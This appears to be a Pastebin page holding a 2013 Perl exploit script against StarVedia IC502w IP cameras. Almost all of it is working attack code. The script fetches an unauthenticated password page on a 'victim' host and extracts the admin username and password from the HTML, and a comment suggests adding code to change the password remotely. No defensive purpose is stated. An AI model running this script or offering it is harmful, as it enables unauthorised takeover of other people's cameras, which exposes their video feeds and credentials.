Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/perl
- #
- # [+] StarVedia IPCamera IC502w IC502w+ v020313 remote bypass username/password disclosure exploit
- # Author: Todor Donev
- # Email: todor.donev at gmail dot com
- # Type: Hardware
- #
- # Thanks to Tsvetelina Emirska the best friend in my life
- # and all my other friends for the help and support which
- # gives me. Kind regards to all of you, who read my lil'
- # exploits.
- # Bulgaria, Sofia
- # 03.2013
- ##
- # http://www.ethical-hacker.org/
- # https://www.facebook.com/ethicalhackerorg
- #
- # Another bug, hint: you can edit this code and add some lines for remote change the password.
- #####
- use LWP::Simple;
- if (@ARGV == 0) {&usg;}
- while (@ARGV > 0) {
- $type = shift(@ARGV);
- $t = shift(@ARGV);
- }
- if ($type eq "-d") {
- my $r = get("http://$t/cgi-bin/passwd.cgi?") or die(" $t: Not vulneruble, $!\n");
- print " [+] StarVedia IPCamera IC502w IC502w+ v020313 remote bypass username/password disclosure exploit\n";
- print " [!] Exploiting: $t\n";
- if ($r =~ m/<INPUT type=text name=user size=20 maxlength=19 value="(.*)">/g) {
- $result .= " [o] User: $1\n";
- }else{die(" Try another exploit, $!");}
- if ($r =~ m/<INPUT type=password name=passwd size=20 maxlength=19 value="(.*)">/g){
- $result .= " [o] Password: $1\n";
- }else{die("Try another exploit or restart the exploit\n");}
- sleep(1);
- print " [\\m/] BINGO!!!\n\a".$result;
- }
- sub usg(){
- print " [!] usg: perl $0 [-r or -d] <victim:port>\n";
- print " [!] -d: disclosure password option\n";
- print " [!] exp: perl $0 -d 127.0.0.1 :)\n";
- exit;
- }
Add Comment
Please, Sign In to add comment